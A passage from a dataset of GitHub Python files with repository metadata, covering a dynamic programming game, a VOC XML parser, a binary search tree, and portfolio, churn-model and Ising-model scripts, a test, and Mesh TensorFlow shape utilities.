6, 2, 3]\n \n # Create a table to store solutions of subproblems\n lookup = [[0 for x in range(len(coin))] for y in range(len(coin))]\n \n print(\"Maximum coins collected by player is\",\n optimalStrategy(coin, 0, len(coin) - 1, lookup))","repo_name":"mohitsaroha03/The-Py-Algorithms","sub_path":"src/zDynamicprogramming/pots-gold-game.py","file_name":"pots-gold-game.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6142159583","text":"import numpy as np\nimport os\nfrom xml.etree import ElementTree\n\nclass XMLParser(object):\n \"\"\" Preprocess the VOC2007 xml annotations data.\n\n # Arguments\n data_path: Data path to VOC2007 annotations\n\n # Return\n data: Dictionary which keys correspond to the image names\n and values are numpy arrays of shape (num_objects, 4 + num_classes)\n num_objects refers to the number of objects in that specific image\n \"\"\"\n\n def __init__(self, data_path, background_id=None, class_names=None):\n self.path_prefix = data_path\n self.background_id = background_id\n if class_names == None:\n self.arg_to_class = self._use_VOC2007_classes()\n else:\n if background_id != None and background_id != -1:\n class_names.insert(background_id, 'background')\n elif background_id == -1:\n class_names.append('background')\n keys = np.arange(len(class_names))\n self.arg_to_class = dict(zip(keys, class_names))\n\n self.class_to_arg = {value: key for key, value\n in self.arg_to_class.items()}\n self.data = dict()\n self._preprocess_XML()\n\n def _use_VOC2007_classes(self):\n class_names = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle',\n 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',\n 'dog', 'horse', 'motorbike', 'person', 'pottedplant',\n 'sheep', 'sofa', 'train', 'tvmonitor']\n if self.background_id != None and self.background_id != -1 :\n class_names.insert(self.background_id, 'background')\n elif self.background_id == -1:\n class_names.append('background')\n\n keys = np.arange(len(class_names))\n arg_to_class = dict(zip(keys, class_names))\n\n return arg_to_class\n\n def get_data(self):\n return self.data\n\n def _preprocess_XML(self):\n filenames = os.listdir(self.path_prefix)\n for filename in filenames:\n tree = ElementTree.parse(self.path_prefix + filename)\n root = tree.getroot()\n bounding_boxes = []\n one_hot_classes = []\n size_tree = root.find('size')\n width = float(size_tree.find('width').text)\n height = float(size_tree.find('height').text)\n for object_tree in root.findall('object'):\n for bounding_box in object_tree.iter('bndbox'):\n xmin = float(bounding_box.find('xmin').text) / width\n ymin = float(bounding_box.find('ymin').text) / height\n xmax = float(bounding_box.find('xmax').text) / width\n ymax = float(bounding_box.find('ymax').text) / height\n bounding_box = [xmin,ymin,xmax,ymax]\n bounding_boxes.append(bounding_box)\n class_name = object_tree.find('name').text\n one_hot_class = self._to_one_hot(class_name)\n one_hot_classes.append(one_hot_class)\n image_name = root.find('filename').text\n bounding_boxes = np.asarray(bounding_boxes)\n one_hot_classes = np.asarray(one_hot_classes)\n image_data = np.hstack((bounding_boxes, one_hot_classes))\n if len(bounding_boxes.shape) == 1:\n image_data = np.expand_dims(image_data, axis=0)\n self.data[image_name] = image_data\n\n def _to_one_hot(self, name):\n num_classes = len(self.class_to_arg)\n one_hot_vector = [0] * num_classes\n class_arg = self.class_to_arg[name]\n one_hot_vector[class_arg] = 1\n return one_hot_vector\n\nif __name__ == '__main__':\n data_path = '../../datasets/VOCdevkit/VOC2007/Annotations/'\n xml_parser = XMLParser(data_path, background_id=0)\n ground_truths = xml_parser.get_data()\n print(xml_parser.arg_to_class)\n\n","repo_name":"AloshkaD/SSD_sandox","sub_path":"tests/XML_parser.py","file_name":"XML_parser.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"18137461299","text":"class Bst:\n def __init__(self, data = None):\n self.data = data\n if self.data:\n self.left = Bst()\n self.right = Bst()\n else:\n self.left = None\n self.right = None\n\n def insert(self,data):\n if self.data is None:\n self.data = data\n self.left = Bst()\n self.right = Bst()\n elif self.data > data:\n if self.left is not None:\n self.left.insert(data)\n else:\n temp = Bst(data)\n self.left = temp\n else:\n if self.right is not None:\n self.right.insert(data)\n else:\n temp = Bst(data)\n self.right = temp\n\n def inorder(self):\n if self.data is None:\n return\n else:\n self.left.inorder()\n print(self.data)\n self.right.inorder()\n\n def insert_queue(self,queue):\n if self.left.data:\n queue.append(self.left)\n if self.right.data:\n queue.append(self.right)\n\n def levelorder(self):\n if self.data is None:\n return\n else:\n print(self.data)\n queue = []\n self.insert_queue(queue)\n while queue:\n print(queue[0].data)\n queue[0].insert_queue(queue)\n del queue[0]\n\n def printleaf(self):\n if self.data is None:\n return\n else:\n if self.left.data is None and self.right.data is None:\n print(self.data)\n self.left.printleaf()\n self.right.printleaf()\n\n def printleftnodes(self):\n if self.data is None:\n return\n else:\n print(self.data)\n self.left.printleaf()\n\n def printrightnodes(self):\n if self.data is None:\n return\n else:\n print(self.data)\n self.right.printleaf()\n\n def printedges(self):\n print(self.data)\n self.left.printleftnodes()\n self.right.printrightnodes()\n\n def height(self):\n if self.data is None:\n return 0\n else:\n return (max(self.left.height()+1, self.right.height()+1))\n\n\n","repo_name":"shubhankar01/Python-Datastructures","sub_path":"tree/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22348610725","text":"#!/usr/bin/env python\n\n\"\"\"\nModuleVelo.py - Tasks for running single cell velocyto pipeline.\n\n\"\"\"\nimport os\nimport cgatcore.pipeline as P\n\n\ndef check_paired_end(fastqfiles):\n \"checks if data is paired end or single end\"\n fastqfile1 = []\n fastqfile2 = []\n for fastqfile in fastqfiles:\n if fastqfile.endswith(\".fastq.2.gz\"):\n bn = P.snip(fastqfile, \".fastq.2.gz\")\n infile1 = \"%s.fastq.1.gz\" % bn\n infile2 = \"%s.fastq.2.gz\" % bn\n if not os.path.exists(infile1):\n raise ValueError(\"cant find paired end file \"\n\t \"'%s' for '%s'\" % (infile1, infile2))\n fastqfile1.append(infile1)\n fastqfile2.append(infile2)\n else:\n raise ValueError(\"Alevin requires UMI/CB file and reads file\")\n\n fastqfiles = [fastqfile1, fastqfile2]\n return(fastqfiles)\n\ndef check_multiple_read_files(infiles):\n if isinstance(infiles[0], tuple):\n index = infiles[0][1]\n\n fastqs = [x[0] for x in infiles]\n\n else:\n fastqs = [infiles[0]]\n index = infiles[1]\n\n output = [fastqs, index]\n return(output)\n\ndef check_multiple_read_files_no_index(infiles):\n if isinstance(infiles, tuple):\n fastqs = [x for x in infiles]\n\n else:\n fastqs = [infiles]\n\n\n output = fastqs\n return(output)\n","repo_name":"cribbslab/scflow","sub_path":"scpipelines/ModuleVelo.py","file_name":"ModuleVelo.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"70"}
+{"seq_id":"13035994816","text":"import numpy as np\nimport pandas as pd\n\nclass RiskPortfolio():\n def __init__(self, sigma):\n dim = sigma.shape[0]\n self.w_equaly_weighted = self.equaly_weighted(dim)\n self.w_inv_variance = self.inv_variance(sigma, dim)\n self.w_min_variance = self.min_variance(sigma, dim)\n\n def equaly_weighted(self, dim):\n identity = np.identity(dim)\n ones = np.ones((dim, 1))\n \n return (identity @ ones)/(ones.T @ identity @ ones)\n\n def inv_variance(self, sigma, dim):\n lambda_ = np.diag(np.diag(sigma))\n lambda_2 = lambda_ ** 2\n ones = np.ones((dim, 1))\n\n return (np.linalg.inv(lambda_2) @ ones)/ (ones.T @ np.linalg.inv(lambda_2) @ ones)\n\n def min_variance(self, sigma, dim):\n ones = np.ones((dim, 1))\n\n return (np.linalg.inv(sigma) @ ones) / (ones.T @ np.linalg.inv(sigma) @ ones)\n \n def get_weights(self, type):\n if type == 'Min Variance':\n return self.w_min_variance\n elif type == 'Inv Variance':\n return self.w_inv_variance\n elif type == 'Equally Weighted':\n return self.w_equaly_weighted\n else:\n print('Not a Valid Type. You can try one of the following: Min Variance, Inv Variance, Equally Weighted')\n return None\n\n'''\nfrom mu import *\nfrom sigma import *\nfrom dataloader import *\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ntickers = ['AAPL', 'GOOG', 'IBM', 'TSLA', 'BLK', 'AMZN', 'COTY', 'PFE']\nperiod = '12mo'\nrebalancing_freq = 5*21\ndata = Dataloader(period, tickers, rebalancing_freq)\ndates, tickers_close_info = data.get_close()\nclose_returns = pd.DataFrame()\ni = 0\ns = {}\nVaR_1mo_95 = {}\nfor close_df in tickers_close_info:\n\n tickers_close_returns = (close_df/close_df.shift(1)).dropna() - 1\n sigma = Sigma(tickers_close_returns,rebalancing_freq).get_sigma()\n\n if i > 0:\n\n risk_inv_df = (tickers_close_returns.multiply(risk__weights_inv)).sum(axis = 1)\n\n risk_min_df = (tickers_close_returns.multiply(risk__weights_min)).sum(axis = 1)\n\n risk_eq_df = (tickers_close_returns.multiply(risk__weights_eq)).sum(axis = 1)\n\n tickers_close_returns['Portfolio Risk Inverse Variance'] = risk_inv_df\n tickers_close_returns['Portfolio Risk Min Variance'] = risk_min_df\n tickers_close_returns['Portfolio Risk Equally Weighted'] = risk_eq_df\n\n tickers_close_returns.dropna(axis = 0, inplace = True)\n close_returns = close_returns.append(tickers_close_returns)\n\n else:\n i = 1\n \n risk_ = RiskPortfolio(sigma)\n risk__weights_inv = np.transpose(risk_.get_weights('Inv Variance'))[0]\n risk__weights_min = np.transpose(risk_.get_weights('Min Variance'))[0]\n risk__weights_eq = np.transpose(risk_.get_weights('Equally Weighted'))[0]\n\nportfolios = ['Portfolio Risk Inverse Variance', 'Portfolio Risk Min Variance', 'Portfolio Risk Equally Weighted']\nfor p in portfolios:\n s[p] = (np.mean(close_returns[p])/np.std(close_returns[p]))\n VaR_1mo_95[p] = np.mean(close_returns[p]) - 1.65 * np.sqrt(21) * np.std(close_returns[p])\n# close_returns = (close_returns + 1).cumprod(axis = 0)\n# close_returns[['Portfolio Risk Inverse Variance', 'Portfolio Risk Min Variance', 'Portfolio Risk Equally Weighted']].plot()\n# plt.ylabel('Cummulative Returns') \n# plt.suptitle('Minimum Variance Portfolio Performance')\n# plt.show()\n\ndf = pd.DataFrame([VaR_1mo_95, s], index = ['VaR 95 at 1mo horizon', 'Sharpe 
Ratio']).T\nprint(df.to_latex())\n'''","repo_name":"felipe-fp/portfolio_optimization","sub_path":"risk_portfolio.py","file_name":"risk_portfolio.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"36286202657","text":"\"\"\"\n This script performs Randomized Grid Search CV for customer churn model\n\n Dependencies:\n ../model_data_prep/model_data_prep.py\n ../model_data_prep/model_data_eda_and_feature_engg.ipynb\n ../model_data_prep/data_cleaning_and_data_split.ipynb\n data_downsampling.py\n\"\"\"\n\n# Load packages\nfrom pathlib import Path\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nimport xgboost as xgb\nimport lightgbm as lgb\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.metrics import f1_score, roc_auc_score, log_loss\nimport mlflow\nimport time\nimport joblib\n\n\ndef load_data_function():\n \"\"\"\n Function to load model data\n \"\"\"\n # Load train dataset\n data_folder = Path.cwd().parents[0].joinpath('data', 'processed_data')\n x_train = np.load(data_folder.joinpath('x_train_onehot_downsampled.npy'))\n y_train = np.load(data_folder.joinpath('y_train_downsampled.npy'))\n\n # Load validation dataset\n x_val = np.load(data_folder.joinpath('x_val_onehot_encode.npy'))\n y_val = np.load(data_folder.joinpath('y_val.npy'))\n\n # Scale data\n data_scaler = StandardScaler()\n data_scaler.fit(x_train)\n x_train_scaled = data_scaler.transform(x_train)\n x_val_scaled = data_scaler.transform(x_val)\n\n # Load numeric encoded dataset\n x_train_2 = np.load(data_folder.joinpath('x_train_num_downsampled.npy'))\n x_val_2 = np.load(data_folder.joinpath('x_val_num_encode.npy'))\n\n return x_train, x_train_2, x_train_scaled, x_val, x_val_2, x_val_scaled, y_train, y_val\n\n\ndef main():\n # Load model data\n x_train, x_train_2, x_train_scaled, x_val, x_val_2, x_val_scaled, y_train, y_val = load_data_function()\n\n # Initialize models\n models_dict = {\n 'Logistic_Regression': LogisticRegression(random_state=1),\n 'XGBoost': xgb.XGBClassifier(random_state=2, use_label_encoder=False, n_jobs=-1),\n 'LightGBM': lgb.LGBMClassifier(random_state=3, n_jobs=-1)\n }\n\n # Create a dict of parameters to be tuned\n model_params_dict = {'Logistic_Regression': [{'penalty': ['l2'], 'C': [1.0, 0.5]},\n {'penalty': ['l1'], 'C': [1.0, 0.5], 'solver': ['liblinear']}],\n 'RandomForestClassifier': {'n_estimators': [100, 250, 500, 1000],\n 'criterion': ['gini', 'entropy'],\n 'min_samples_split': [2, 5, 10, 25, 50],\n 'min_samples_leaf': [1, 5, 10, 25]},\n 'XGBoost': {'n_estimators': [100, 500, 1000], 'max_depth': [3, 5, 10],\n 'learning_rate': [0.5, 0.1, 0.01, 0.001], 'subsample': [0.6, 0.8, 1.0]},\n 'LightGBM': {'boosting_type': ['gbdt', 'goss'], 'learning_rate': [0.001, 0.01, 0.1],\n 'max_depth': [3, 5, 10, 50], 'n_estimators': [50, 100, 500, 1000],\n 'subsample': [1, 0.8], 'reg_alpha': [0, 0.5], 'reg_lambda': [0, 0.5],\n 'min_data_in_leaf': [100, 500, 1000], 'num_leaves': [6, 24, 500]}}\n\n # Choose train dataset\n model_data = {'Logistic_Regression': 'x_train_scaled',\n 'XGBoost': 'x_train',\n 'RandomForestClassifier': 'x_train',\n 'LightGBM': 'x_train_2'\n }\n\n # Choose validation dataset\n val_data = {'Logistic_Regression': 'x_val_scaled',\n 'XGBoost': 'x_val',\n 'RandomForestClassifier': 'x_val',\n 'LightGBM': 'x_val_2'}\n\n # Create a dict for grid search\n models_grid_search = dict()\n\n start_time = time.time()\n\n for model in models_dict.items():\n print(f\"Running {model[0]}\")\n # Start mlflow run\n with mlflow.start_run(run_name=\"Grid search: \" + model[0]):\n models_grid_search[model[0]] = RandomizedSearchCV(estimator=model[1],\n param_distributions=model_params_dict[model[0]],\n 
n_iter=50,\n scoring=['neg_log_loss', 'f1', 'roc_auc'],\n cv=5,\n refit='f1',\n verbose=3)\n\n if model[0] == \"LightGBM\":\n models_grid_search[model[0]].fit(eval(model_data[model[0]]), y_train,\n categorical_feature=[eval(model_data[model[0]]).shape[1]-1]\n )\n else:\n models_grid_search[model[0]].fit(eval(model_data[model[0]]), y_train)\n\n # Get best cv score\n mean_cv_score = np.mean(models_grid_search[model[0]].best_score_)\n std_cv_score = np.std(models_grid_search[model[0]].best_score_)\n\n # Get scores for validation data\n val_pred_prob = models_grid_search[model[0]].best_estimator_.predict_proba(eval(val_data[model[0]]))[:, -1]\n val_f1_score = f1_score(y_val,\n models_grid_search[model[0]].best_estimator_.predict(eval(val_data[model[0]])))\n val_roc_score = roc_auc_score(y_val, val_pred_prob)\n val_log_loss = log_loss(y_val, val_pred_prob)\n\n # Log metrics\n mlflow.log_metrics({'mean_cv_f1_score': mean_cv_score,\n 'std_cv_f1_score': std_cv_score,\n 'validation_f1_score': val_f1_score,\n 'validation_auc_roc': val_roc_score,\n 'validation_log_loss': val_log_loss})\n\n # Store the best models\n Path.cwd().parents[0].joinpath('saved_models_randomized_cv_search').mkdir(parents=True, exist_ok=True)\n joblib.dump(models_grid_search[model[0]],\n Path.cwd().parents[0].joinpath('saved_models_randomized_cv_search',\n model[0].lower() + '.joblib'))\n\n print(f\"Run time: {np.round(time.time() - start_time, 4)}\")\n print(\"Finished modelling\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nithishkaviyan/customer_churn_prediction","sub_path":"modelling/grid_search_cv_models.py","file_name":"grid_search_cv_models.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14060198864","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# %%\n\nnp.random.seed(12)\n\n# define Ising model aprams\n# system size\nL = 40\nN = 600\n\n# create 10000 random Ising states\nstates = np.random.choice([-1, 1], size=(N, L))\n\n\ndef ising_energies(states):\n \"\"\"\n This function calculates the energies of the states in the nn Ising Hamiltonian\n \"\"\"\n L = states.shape[1]\n J = np.zeros((L, L))\n for i in range(L):\n J[i, (i + 1) % L] = -1.0 # interaction between nearest-neighbors\n\n # compute energies\n E = np.einsum('...i,ij,...j->...', states, J, states)\n\n return E\n\n\n# calculate Ising energies\nenergies = ising_energies(states)\nenergies\n#%%\nJ = np.zeros((L, L))\nJ\n# %%\n# reshape Ising states into RL samples: S_iS_j --> X_p\nstates = np.einsum('...i,...j->...ij', states, states)\nshape = states.shape\nshape\n#%%\nstates = states.reshape((shape[0], shape[1] * shape[2]))\n# build final data set\nData = np.c_[states, energies.reshape(N,1)]\nstates\n#%%\na=np.array([[[1,2,4,7,3],[2,1,4,2,6]]])\na.shape[2]\n\n#%%\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndf1 = pd.DataFrame(Data)\ntrain_set, test_set = train_test_split(df1, test_size=0.2, random_state=42)\ntrain_set\n#%%\ndata_spins = train_set.drop([1600], axis=1, inplace=False)\ndata_label = train_set[1600].copy()\n#%%\ndata_spins, data_label\n#%%\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import cross_val_score, GridSearchCV\nfrom sklearn.linear_model import Ridge, Lasso, SGDRegressor\n\n#%%\nlin_reg = LinearRegression()\nlin_reg.fit(data_spins, data_label)\n#%%\nlin_reg.get_params()\n#%%\n#prediction = lin_reg.predict([data_spins.iloc[20]])\n#prediction\n#data_label.iloc[20]\n#%%\n#lin_predict = lin_reg.predict(data_spins)\n#lin_mse = mean_squared_error(lin_predict, data_label)\n#lin_mse\n#%%\nridge_reg = Ridge() # alpha=1\n#ridge_reg.get_params()\nridge_reg.fit(data_spins, data_label)\npredict = ridge_reg.predict(data_spins)\nridg_mse = mean_squared_error(predict, data_label)\nridg_mse\n#%%\n# Seems we have overfitting, It could be solved, first, let us examine it with cross_val_score\n#%%\nridge_score = cross_val_score(ridge_reg, data_spins, data_label,\n scoring='neg_mean_squared_error',\n cv=5)\nprint(-ridge_score)\nridge_rmse = np.sqrt(-ridge_score)\nridge_rmse\n#%% It shows high mse, let's use hyperparameter tuning\n#%%\nparam_grid = [{\n 'alpha' : np.logspace(-4, 5, 10),\n #'copy_X': True, 'fit_intercept': True,\n #'max_iter': None, 'normalize': False, 'random_state': None\n }]\n\ngrid_search_ridge = GridSearchCV(ridge_reg, param_grid, cv=3,\n scoring='neg_mean_squared_error',\n return_train_score=True)\ngrid_search_ridge.fit(data_spins, data_label)\n#%%\ngrid_search_ridge.best_params_\n#%%\nridge_model = grid_search_ridge.best_estimator_\nridge_score = cross_val_score(ridge_model, data_spins, data_label,\n scoring='neg_mean_squared_error',\n cv=5)\nridge_rmse = np.sqrt(-ridge_score)\nridge_rmse\n#%%\nprint(grid_search_ridge.best_params_)\n#%%\nridge_model = grid_search_ridge.best_estimator_\nj_ridge = ridge_model.coef_\nj_ridge\n#%%\n#cmaps['Perceptually Uniform Sequential'] = [\n# 'viridis', 'plasma', 'inferno', 'magma', 'cividis']\n#\n#cmaps['Sequential'] = [\n# 'Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds',\n# 'YlOrBr', 'YlOrRd', 'OrRd', 'PuRd', 'RdPu', 'BuPu',\n# 'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 
'YlGn']\n\nplt.imshow(j_ridge.reshape(L, L), #cmap='YlOrRd'\n )\nplt.title(r\"Ridge $\\alpha=0.0001$\")\nplt.show()\n\n#%%\nridge_reg.get_params()\n#%%\nlasso_reg = Lasso() # alpha=1\nparam_grid = [{\n 'alpha' : np.logspace(-4, 5, 10),\n #'copy_X': True, 'fit_intercept': True,\n #'max_iter': None, 'normalize': False, 'random_state': None\n }]\n\ngrid_search_lasso = GridSearchCV(lasso_reg, param_grid, cv=3,\n scoring='neg_mean_squared_error',\n return_train_score=True)\ngrid_search_lasso.fit(data_spins, data_label)\n#%%\ngrid_search_lasso.best_params_\n#%%\nlasso_model = grid_search_lasso.best_estimator_\nj_lasso = lasso_model.coef_\nj_lasso\n#%%\nplt.imshow(j_lasso.reshape(L, L))\nplt.title(r\"LASSO $\\alpha=0.001$\")\nplt.show()\n#%%\nfinal_lasso_model = grid_search_lasso.best_estimator_\nlasso_best_score = cross_val_score(final_lasso_model, data_spins, data_label,\n scoring='neg_mean_squared_error',\n cv=5)\nlasso_best_rmse = np.sqrt(-lasso_best_score)\nlasso_best_rmse\n#%%","repo_name":"mohammadreza-ebrahimi/1D-Ising-model","sub_path":"1d-ising.py","file_name":"1d-ising.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29048467133","text":"\n\ndef test__consensus_deciders():\n from src.utils.consensus_decider import ConsensusDecider\n\n test1 = ConsensusDecider()\n test1.put(\"a\", 1)\n test1.put(\"b\", 1)\n test1.put(\"b\", 1)\n assert test1.arbitrate() == \"b\"\n\n assert test1.has_majority()\n\n test2 = ConsensusDecider()\n test2.put(\"a\", 3)\n test2.put(\"b\", 1)\n test2.put(\"b\", 1)\n assert test2.arbitrate() == \"a\"\n\n test2.put(\"b\", 1)\n assert not test2.has_majority()\n test2.put(\"b\", 1)\n assert test2.has_majority()\n\n test3 = ConsensusDecider()\n test3.put(\"a\", 1000)\n assert test3.arbitrate() == \"a\"\n\n test4 = ConsensusDecider()\n test4.put(\"a\", 1000)\n assert test4.has_majority()\n\n test4.put(\"b\", 1000)\n test4.put(\"c\", 1000)\n\n # assert not test4.has_majority()\n\n test5 = ConsensusDecider()\n assert test5.arbitrate() is None\n assert not test5.has_majority()\n\n\n","repo_name":"jovialis/vu-course-planner","sub_path":"functions/tests/test_consensus_decider.py","file_name":"test_consensus_decider.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"6691150917","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nfrom functools import reduce # pylint: disable=redefined-builtin; for py3\nfrom operator import mul\nimport re\nimport six\nfrom six.moves import xrange # pylint: disable=redefined-builtin\n\nfrom tensor2tensor.mesh_tensorflow import mtf_utils\nimport tensorflow as tf\n\n\nDimension = collections.namedtuple(\"Dimension\", [\"name\", \"size\"])\n\n\ndef convert_to_dimension(d):\n \"\"\"Converts input to a Dimension.\n\n Args:\n d: Dimension, tuple (string, int), or None.\n\n Returns:\n Dimension or None.\n\n Raises:\n ValueError: If d cannot be converted to a Dimension.\n \"\"\"\n if d is None:\n return None\n if isinstance(d, Dimension):\n return d\n name, size = d\n if isinstance(name, str) and isinstance(size, int):\n return Dimension(name, size)\n else:\n raise ValueError(\"could not convert %s to Dimension\" % (d,))\n\n\nclass Shape(object):\n \"\"\"Shape of a Tensor or Mesh.\n\n #### Examples\n\n ```python\n # Create shape [4, 8] with names \"x\" and \"y\" respectively.\n shape = mtf.Shape([mtf.Dimension(\"x\", 4), mtf.Dimension(\"y\", 8)])\n ```\n \"\"\"\n\n def __init__(self, dims):\n \"\"\"Constructs a shape for a Tensor or Mesh.\n\n Args:\n dims: List-like of Dimensions.\n\n Raises:\n ValueError: If Dimensions are repeated.\n \"\"\"\n self._dims = [convert_to_dimension(d) for d in tuple(dims)]\n if len(set(dims)) != len(dims):\n raise ValueError(\"Shape must not have repeated dimensions %s\" % dims)\n\n @property\n def dims(self):\n return list(self._dims)\n\n @property\n def ndims(self):\n return len(self._dims)\n\n def __repr__(self):\n return self.to_string\n\n def __eq__(self, other):\n return self.dims == other.dims\n\n def __ne__(self, other):\n return self.dims != other.dims\n\n def __add__(self, other):\n if isinstance(other, Shape):\n other = other.dims\n if isinstance(other, Dimension):\n other = [other]\n return Shape(self.dims + other)\n\n def __sub__(self, other):\n if other is None:\n return self\n if isinstance(other, Shape):\n other = other.dims\n if isinstance(other, Dimension):\n other = [other]\n return Shape([d for d in self.dims if d not in other])\n\n def __len__(self):\n return len(self._dims)\n\n def __getitem__(self, key):\n return self._dims[key]\n\n def __iter__(self):\n return iter(self._dims)\n\n @property\n def to_integer_list(self):\n return [d.size for d in self.dims]\n\n @property\n def size(self):\n return list_product(self.to_integer_list)\n\n @property\n def to_string(self):\n return \"Shape[%s]\" % \", \".join(\n [\"%s=%d\" % (d.name, d.size) for d in self.dims])\n\n @property\n def cumprod(self):\n \"\"\"Cumulative product (exclusive) of Dimension sizes.\"\"\"\n return _cumprod(self.to_integer_list)[::-1]\n\n def cumprod_to_tensor_axis(self, cumprod):\n \"\"\"Tensor axis i such that self.cumprod[i] == cumprod, or None.\"\"\"\n try:\n return self.cumprod.index(cumprod)\n except ValueError:\n return None\n\n @property\n def dimension_names(self):\n return [d.name for d in self.dims]\n\n def rename_dimension(self, old_name, new_name):\n \"\"\"Returns a copy where one dimension is renamed.\"\"\"\n if old_name not in self.dimension_names:\n raise ValueError(\"Shape %s does not have dimension named %s\"\n % (self, old_name))\n return Shape(\n [Dimension(new_name, d.size) if d.name == old_name else d\n for d in self.dims])\n\n def resize_dimension(self, name, new_size):\n \"\"\"Returns a 
copy where one dimension has a different size.\"\"\"\n if name not in self.dimension_names:\n raise ValueError(\"Shape %s does not have dimension named %s\"\n % (self, name))\n return Shape(\n [Dimension(name, new_size) if d.name == name else d\n for d in self.dims])\n\n\ndef convert_to_shape(x):\n \"\"\"Converts input to a Shape.\n\n Args:\n x: Shape, str, or None.\n\n Returns:\n Shape or None.\n\n Raises:\n ValueError: If x cannot be converted to a Shape.\n \"\"\"\n if x is None:\n return None\n if isinstance(x, Shape):\n return x\n if isinstance(x, str):\n x = _parse_string_to_list_of_pairs(x, seconds_to_int=True)\n return Shape(x)\n\n\nclass LayoutRules(object):\n \"\"\"Represents layout of a computation.\n\n #### Examples\n\n ```python\n # Map \"d_ff\" and \"heads\" Tensor Dimensions to the \"model\" Mesh Dimension.\n layout_rules = mtf.LayoutRules([(\"d_ff\", \"model\"), (\"heads\", \"model\")])\n ```\n \"\"\"\n\n def __init__(self, pairs):\n \"\"\"Constructs a layout.\n\n Args:\n pairs: Set-like of string pairs (tensor_dim_name, mesh_dim_name).\n \"\"\"\n self._pairs = set(pairs)\n\n def __repr__(self):\n return \"LayoutRules%s\" % self._pairs\n\n def tensor_dimension_to_mesh_axis(self, tensor_dimension, mesh_shape):\n \"\"\"Mesh axis associated with tensor dimension (or None).\n\n Args:\n tensor_dimension: Dimension.\n mesh_shape: Shape.\n\n Returns:\n Integer or None.\n\n Raises:\n ValueError: If one Tensor dimension maps to two mesh dimensions.\n \"\"\"\n val = [i for i, mesh_dimension in enumerate(mesh_shape)\n if (tensor_dimension.name, mesh_dimension.name) in self._pairs]\n if len(val) > 1:\n raise ValueError(\n \"Tensor dimension maps to multiple mesh dimensions\"\n \" tensor_dimension=%s mesh_shape=%s layout=%s\"\n % (tensor_dimension, mesh_shape, self._pairs))\n return val[0] if val else None\n\n def tensor_layout(self, tensor_shape, mesh_shape):\n \"\"\"Computes TensorLayout given a Tensor Shape and a Mesh Shape.\n\n Args:\n tensor_shape: Shape.\n mesh_shape: Shape.\n\n Returns:\n TensorLayout.\n\n Raises:\n ValueError: If two Tensor Dimensions map to the same Mesh Dimensions.\n \"\"\"\n ret = [self.tensor_dimension_to_mesh_axis(d, mesh_shape)\n for d in tensor_shape]\n not_nones = [a for a in ret if a is not None]\n if len(not_nones) != len(set(not_nones)):\n raise ValueError(\n \"Two Tensor Dimensions may not map to the same Mesh Dimension:\"\n \" layout=%s tensor_shape=%s mesh_shape=%s \" %\n (self, tensor_shape, mesh_shape))\n return TensorLayout(ret)\n\n\ndef convert_to_layout_rules(x):\n \"\"\"Converts input to a LayoutRules.\n\n Args:\n x: LayoutRules, str, or set-like of string pairs.\n\n Returns:\n LayoutRules.\n \"\"\"\n if isinstance(x, LayoutRules):\n return x\n if isinstance(x, str):\n x = _parse_string_to_list_of_pairs(x)\n return LayoutRules(x)\n\n\nclass TensorLayout(object):\n \"\"\"Injective partial map between Tensor axes and Mesh axes.\n\n TensorLayout is a tuple of optional integers with length tensor.ndims. 
Each\n item is either a unique integer indicating the mesh axis over which that\n tensor dimension is split or None, indicating that this tensor dimension is\n not split.\n\n #### Examples\n\n ```python\n # Split first and last Tensor dimensions according to mesh axes 0 and 1.\n tensor_layout = mtf.TensorLayout([0, None, 1])\n ```\n \"\"\"\n\n def __init__(self, tensor_axis_to_mesh_axis):\n \"\"\"Creates a TensorLayout.\n\n Args:\n tensor_axis_to_mesh_axis: List-like where each element is an int or None.\n \"\"\"\n self._tensor_axis_to_mesh_axis = tuple(tensor_axis_to_mesh_axis)\n\n def __eq__(self, other):\n return self.tensor_axis_to_mesh_axis == other.tensor_axis_to_mesh_axis\n\n def __ne__(self, other):\n return self.tensor_axis_to_mesh_axis != other.tensor_axis_to_mesh_axis\n\n def __repr__(self):\n return \"TensorLayout%s\" % (self.tensor_axis_to_mesh_axis,)\n\n def __len__(self):\n return len(self._tensor_axis_to_mesh_axis)\n\n def __getitem__(self, key):\n return self._tensor_axis_to_mesh_axis[key]\n\n def __iter__(self):\n return iter(self._tensor_axis_to_mesh_axis)\n\n @property\n def tensor_axis_to_mesh_axis(self):\n \"\"\"Converts to a tuple of optional integers.\"\"\"\n return self._tensor_axis_to_mesh_axis\n\n @property\n def is_fully_replicated(self):\n \"\"\"Whether all tensor dimensions map to None.\"\"\"\n return 